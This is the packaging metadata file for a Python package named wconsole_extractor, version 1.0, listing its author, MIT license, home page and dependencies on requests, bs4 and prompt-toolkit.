Metadata-Version: 2.1
Name: wconsole_extractor
Version: 1.0
Home-page: https://github.com/Ruulian/wconsole_extractor
Author: Ruulian
Author-email: ruulian@protonmail.com
License: MIT
Classifier: Programming Language :: Python :: 3
Classifier: Operating System :: OS Independent
License-File: LICENSE
Requires-Dist: requests
Requires-Dist: bs4
Requires-Dist: prompt-toolkit
